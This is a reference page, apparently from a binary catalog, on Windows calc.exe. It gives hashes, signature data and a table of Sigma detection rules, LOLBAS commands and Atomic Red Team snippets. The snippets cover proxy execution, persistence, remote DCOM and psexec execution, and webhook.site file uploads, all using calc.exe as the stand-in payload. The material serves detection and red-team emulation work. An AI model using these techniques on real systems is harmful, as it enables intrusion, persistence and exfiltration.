calc.exe

  • File Path: C:\Windows\system32\calc.exe
  • Description: Windows Calculator

Hashes

Type Hash
MD5 4673C27FDCAB6166578A1863060D83FF
SHA1 4A2446EE9651D90AC6C5613BDDF416DF197F6401
SHA256 B093FD472121CDA0BBB1E0079479DE36325F1B2FAA7FDA54C4F757565572FE1D
SHA384 FDD4BB991CD9FB460DE2A77B1EC9142988AB256604102F04AA775C4E274B94FD0A7B467FCADB1A5A547C3BCEB8A88ED0
SHA512 D570BA4428BC5085B7CADD56A25233CAB810DCEB17D8873D4B458A4E7FA565201B45525F252489B4571ECEC24333BA216907FC849992A74572ADE03E61F00F3E
SSDEEP 384:ju/51mFSDUiIMbPWUrytejUSFqpy7LJcGWSAYWSiiiiiiiiiiiiiiiiiiiiiiiik:juiQI0OUfjUUevb

Runtime Data

Child Processes:

win32calc.exe

Signature

  • Status: Signature verified.
  • Serial: 33000000BCE120FDD27CC8EE930000000000BC
  • Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: CALC.EXE
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 10.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\SysWOW64\calc.exe 32

Possible Misuse

The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_susp_calc.yml description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion DRL 1.0
sigma win_susp_calc.yml CommandLine: '*\calc.exe *' DRL 1.0
sigma win_susp_calc.yml Image: '*\calc.exe' DRL 1.0
LOLBAS Explorer.yml - Command: explorer.exe calc.exe  
LOLBAS Explorer.yml Description: 'Executes calc.exe as a subprocess of explorer.exe.'  
LOLBAS Gpup.yml - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe  
LOLBAS Nvudisp.yml - Command: Nvudisp.exe System calc.exe  
LOLBAS Nvudisp.yml Description: Execute calc.exe as a subprocess.  
LOLBAS Nvudisp.yml - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe System calc.exe  
LOLBAS Nvuhda6.yml Description: Execute calc.exe as a subprocess.  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"  
LOLBAS Nvuhda6.yml - Command: nvuhda6.exe KillApp calc.exe  
LOLBAS Usbinst.yml Description: Execute calc.exe through DefaultInstall Section Directive in INF file.  
LOLBAS Bash.yml - Command: bash.exe -c calc.exe  
LOLBAS Bash.yml Description: Executes calc.exe from bash.exe  
LOLBAS ConfigSecurityPolicy.yml - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile  
LOLBAS DataSvcUtil.yml - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile  
LOLBAS Diskshadow.yml - Command: diskshadow> exec calc.exe  
LOLBAS Explorer.yml - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"  
LOLBAS Explorer.yml Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe  
LOLBAS Extrac32.yml - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe  
LOLBAS Extrac32.yml Description: Command for copying calc.exe to another folder  
LOLBAS Forfiles.yml - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe  
LOLBAS Forfiles.yml Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.  
LOLBAS Ftp.yml - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt  
LOLBAS Hh.yml - Command: HH.exe c:\windows\system32\calc.exe  
LOLBAS Hh.yml Description: Executes calc.exe with HTML Help.  
LOLBAS Pcalua.yml - Command: pcalua.exe -a calc.exe  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.  
LOLBAS Scriptrunner.yml - Command: Scriptrunner.exe -appvscript calc.exe  
LOLBAS Scriptrunner.yml Description: Executes calc.exe  
LOLBAS Ttdinject.yml - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"  
LOLBAS Ttdinject.yml - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"  
LOLBAS Tttracer.yml - Command: tttracer.exe C:\windows\system32\calc.exe  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe  
LOLBAS Advpack.yml - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe  
LOLBAS Ieadvpack.yml - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Pcwutl.yml - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf  
LOLBAS Setupapi.yml - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Appvlp.yml - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"  
LOLBAS Sqltoolsps.yml - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe  
LOLBAS Vsjitdebugger.yml - Command: Vsjitdebugger.exe calc.exe  
LOLBAS Vsjitdebugger.yml Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.  
LOLBAS Wsl.yml - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe  
LOLBAS Wsl.yml Description: Executes calc.exe from wsl.exe  
atomic-red-team problem_report.md e.g. The atomic test executes and calc.exe is launched. MIT License. © 2018 Red Canary
atomic-red-team hta.md SW.Document.Application.ShellExecute(“cmd.exe”, “/c calc.exe”, ‘C:\Windows\System32’, null, 0); MIT License. © 2018 Red Canary
atomic-red-team hta.md Mshta spawns child process of calc.exe. MIT License. © 2018 Red Canary
atomic-red-team hta.md var r = new ActiveXObject(“WScript.Shell”).Run(“calc.exe”); MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md Upon successful execution, cmd will spawn calc.exe on a remote computer. MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md [activator]::CreateInstance([type]::GetTypeFromProgID(“MMC20.application”,”#{computer_name}”)).Document.ActiveView.ExecuteShellCommand(“c:\windows\system32\calc.exe”, $null, $null, “7”) MIT License. © 2018 Red Canary
atomic-red-team T1027.004.md | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md | exe_path | path to exe to use when creating masquerading files | path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks /create /tn “T1053_005_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md schtasks /create /tn “T1053_005_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1053.005.md $Action = New-ScheduledTaskAction -Execute “calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md This module executes calc.exe from within the WINWORD.EXE process MIT License. © 2018 Red Canary
atomic-red-team T1106.md Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. MIT License. © 2018 Red Canary
atomic-red-team T1112.md | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1140.md | executable | name of executable | path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1140.md | executable | name of executable/file to decode | path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md Upon execution, calc.exe should open MIT License. © 2018 Red Canary
atomic-red-team T1202.md | payload_path | Path to payload | path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md | process | Process to execute | string | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1202.md “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1202.md Upon execution calc.exe will be opened MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{bat_path}” For Output As #1n Write #1, “calc.exe"n Close #1n a = Shell(“cmd.exe /c $bat_path ", vbNormalFocus)n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md and pull down the script and execute it. By default the payload will execute calc.exe on the system. MIT License. © 2018 Red Canary
atomic-red-team T1216.md Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1216.md | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.md | powershell_code | PowerShell code to execute | string | Start-Process calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1218.001.md Upon execution calc.exe will open MIT License. © 2018 Red Canary
atomic-red-team T1218.002.md Upon execution calc.exe will be launched MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.010.md windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Upon execution calc.exe will be launched MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | command_to_execute | Command for rundll32.exe to execute | string | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.012.md | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1546.013.md Appends a start process cmdlet to the current user’s powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1546.013.md | exe_path | Path the malicious executable | Path | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md $Target = “C:\Windows\System32\calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md $ShortcutLocation = “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md Remove-Item “$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk” -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1547.009.md Upon execution, calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1547.009.md echo URL=C:\windows\system32\calc.exe » #{shortcut_file_path} MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md {DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” } MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md 9. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1564.md This module extracts a binary (calc.exe) from inside of another binary. MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md Upon execution a hidden PowerShell window will launch calc.exe MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula “C:\Windows\System32\calc.exe” MIT License. © 2018 Red Canary
atomic-red-team T1574.002.md Upon execution, calc.exe will be opened. MIT License. © 2018 Red Canary
signature-base thor-webshells.yar $s7 = “""%windir%\\calc.exe"")” CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.